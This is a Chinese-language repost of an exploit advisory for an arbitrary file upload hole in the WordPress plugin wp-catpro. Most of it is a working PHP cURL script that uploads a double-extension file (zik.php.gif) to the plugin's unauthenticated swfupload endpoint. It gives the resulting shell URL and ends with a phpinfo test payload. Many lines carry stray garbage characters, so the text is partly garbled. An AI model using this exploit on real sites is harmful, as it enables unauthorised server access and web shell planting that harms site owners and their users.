WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
+ R: M4 M; ?) m  l& y, N9 t#-----------------------------------------------------------------------

* m4 T  Q. L3 W8 T9 d( M; e$ z% F作者  => Zikou-16
; }1 |% j0 H4 J- U* J邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
. B( ]* l- y& U8 b: T下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
& d4 v& }9 S# [' Q) }
2 Z; h4 t1 G3 u; I5 l#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
; m* J! z7 g: G# ("jpg", "gif", "png")  // Allowed file extensions
1 ~/ Q) M1 j# c  q: Q4 p' L$ _% ^# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
% Y+ e5 i/ T' g* Q5 t- h------------------

8 p: b2 d6 W8 |+ `#=> Exploit
' `" c, q1 I& {' b-----------
6 `/ d! M7 }0 V<?php
  G! \2 c' H) V
& `* @  I" |  I' W' e$uploadfile="zik.php.gif";
5 n  t4 N% R5 \( X6 P! G$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
% n- x! U/ J- P+ o) z; ]' T( Ncurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
1 r: V1 ?4 r6 [4 z& W" _! q" L0 i'folder'=>'/wp-content/uploads/catpro/'));
: @: }! [: w8 dcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
* f, U: Q) r5 ~! Zcurl_close($ch);
- s9 ?- u6 \# G0 Z: W
print "$postResult";
4 H$ Q- v* U2 X6 j% {6 y6 o: w  [
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
& q, o- V  z" H, Y0 ?1 X  ?>
) J, r6 C5 m* u4 i0 F3 e<?php
phpinfo();
1 l& ?7 \! g& v8 e6 d' w?>